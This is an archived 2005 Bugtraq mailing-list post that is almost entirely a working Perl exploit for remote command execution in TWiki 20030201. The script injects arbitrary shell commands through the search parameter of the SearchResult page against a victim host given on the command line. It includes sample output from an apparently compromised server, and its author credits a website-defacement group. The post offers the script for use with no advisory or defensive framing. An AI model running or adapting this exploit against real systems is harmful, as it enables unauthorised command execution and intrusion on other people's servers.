NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 2005-11

TWiki 20030201 VIEW string remote command execution

From: GeekZsecurityfocus.com, (GeekZsecurityfocus.com)
Date: Sun Nov 06 2005 - 20:29:59 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

#!/usr/bin/perl
#
# TWiki 20030201 VIEW string remote command execution

vulnerability
#
# Exploit coded by runvirus GeekZ[at]WorldDefacers[d0t]NeT
#
#
# [rootlocalhost perls]$ perl twikiview.pl -h www.victim.com

-p twiki/bin/view/TWiki/ -c "uname -a;id"
#
#
# -=[ TWiki :- view string remote command execution exploit

]=-
# -=[ Coded by rUnViRuS

]=-
# -=[ HOST:- www.worlddefacers.net www.secuirty-arab.com

]=-
#
# bash-2.05b --> uname -a;id
#
# Linux infong225 2.4.28-grsec-20050113a #1 SMP Thu Jan 13

08:59:31 CET 2005 i686 unknown
# uid=16704(u36561933) gid=600(ftpusers)
#
#

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###################################################################

########################
use Net::HTTP;
use Getopt::Std; getopts('h:p:c:', \%args);

if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $path = $args{'p'}; }
if (defined($args{'c'})) { $thecmd = $args{'c'};}else{$thecmd = "

uname -a;id";}
print STDERR "\n-=[ TWiki 20030201 VIEW string remote command

execution vulnerability ]=-\n";
print STDERR "-=[ HOST:- www.worlddefacers.net www.secuirty-

arab.com ]=-\n";
print STDERR "-=[ Coded by rUnViRuS

]=-\n\n";

if ((!defined($host)) || (!defined($path))) {
Usage();
}

print "bash-2.05b --> $thecmd\n\n";
my $s = Net::HTTP->new(Host => "$host") || die $;
my $thecmd=URLEncode($thecmd);
my $count=0;
my $skip=0;
my $buf2;

my $exploit="?topic=doesnotexist1%27%3B+%28$thecmd%29+%7C+sed+%27

s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l

+--+%27doesnotexist2";
$s->write_request(GET => $path . "SearchResult?search=" .

$exploit, 'User-Agent' => "Mozilla/5.0");
my($code, $mess, %h) = $s->read_response_headers;

# ..,,;:: Procedura di parsing

while (1) {
    my $buf;
    my $n = $s->read_entity_body($buf, 1024);
    die "read failed: $!" unless defined $n;
    last unless $n;
    $buf2 = $buf2 . $buf;
}
    while (index($buf2,"__BEGIN__",$skip) != -1) {
          $from = index($buf2,"__BEGIN__",$skip);
          $count = $count +1;
          $from = $from + 9;
          $to = index($buf2,"__END__",$skip);
          $skip = $to+7;
          $chars = $to - $from;
          $grab = substr($buf2, $from, $chars);
          if (($grab ne $oldgrab) && ($count != 1)){
             print "$grab\n";
             }
         $oldgrab = $grab;
        }
if ( $count <= 1 ){
   print "Host not vulnerable\n";
}

# ..,,;:: Procedura di encoding strarippata da snooq

sub URLEncode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}

sub Usage {
print STDERR "-=[ Options: twikiview.pl -h www.exmpl.com -p

]=-
-=[ -h Victim host .

]=-
-=[ -p Twiki path.

]=-
-=[ -c Command.

]=-\n\n";
exit;
}

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]